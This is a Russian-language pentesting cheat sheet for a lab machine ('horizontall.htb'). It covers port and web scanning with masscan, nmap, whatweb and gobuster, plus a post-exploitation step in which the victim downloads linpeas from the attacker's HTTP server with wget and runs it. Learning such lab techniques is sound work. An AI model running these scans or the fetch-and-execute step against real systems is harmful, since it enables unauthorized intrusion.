# Взлом ## Разведка ### masscan > masscan -e tun0 -p1-65535,U:1-65535 10.10.10.165 --rate=1000 ### Nmap сканирует машину на порты, определяет службы, может искать уязвимости но плохо и медленно > nmap -Pn -n -vvv -T4 -sS -sV --version-all -sC -O -p- --open -oA log_file name_comp где: * -Pn - выключить пинг-сканирование, и считать, что все целевые адреса существуют * -n - не выполняем обратный резолв * -vvv - подробнй вывод * -T4 - скорость, по дефолту Т3 * -sS - syn сканирование открытых портов * -sV - определяем версию сервисов * –version-all - более расширенные проверки * -sC - нмап скриптинг энжин (дефолтный набор скриптов) * -O - определение версии ОС * -p- - сканирование всех портов(по умолчанию нмап сканит первые 1000 портов по TCP) * –open - хотим получить только открытые порты * -oA - вывод во всех форматах * log_file - файлик с отчетом * name_comp - имя нашей машинки * ### whatweb ### whatweb анализирует web сайт(стек технологии) > whatweb --list-plugins > whatweb -a 3 --log-brief=horizonall_whtweb.log http://api-prod.horizontall.htb где: * -а - агрессивный тип, всего их 4, отдельно почитать можно в хелпе * –log-brief - файл куда запишим лог сканирования в выводе увидим ``` http://horizontall.htb http://horizontall.htb [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ub ``` ### gobuster переберает по списку папки и файлы на жертве и если находит сообщает. > gobuster -h > gobuster dir -h | ищет папки > gobuster vhost -h | ищет виртуальные хосты(посути вирт машины) пример: > gobuster dir -u http://horizontall.htb -k -t 50 -b 404,403 -x txt,html,bak,old -o gb_hr.txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt где: * -k - пропускаем проверку сертификаты * -t - количество потоков т.е. одновременных соединений * -b - исключаем коды, которые нам не интересны, например 404 или 403. Ответы с ними не смотрим * -x - список расширений, которые подходят к нашей технологии * -о - название файла куда пишим результат * -w - словарь * ## Анализ уязвимостей(поиск в интернете и тд) Поиск эксплойтов для CMS Strapi, где Strapi- это название CMS(Content Management System) ищем в гугле strapi cms exploit ## Эксплуатация (взлом) ## ПостЭксплуатация (работа на жертве) ### linpeas -поиск уязвимостей на жертве **1. На своей машине** Для начала скачаем linpeas командой > wget https://github.com/carlospolop/PEASS-ng/releases/download/20220529/linpeas.sh затем в одной консоли поднимем сервер > python3 -m http.server 80 **2. На машине жертвы** скачаем > wget http://10.10.14.3/linpeas.sh запустим bash linpeas.sh посмотрим результат less -r log_linpeas.txt ## команды ### посмотреть порт доступен или нет nc -zv 192.168.1.200 135 ###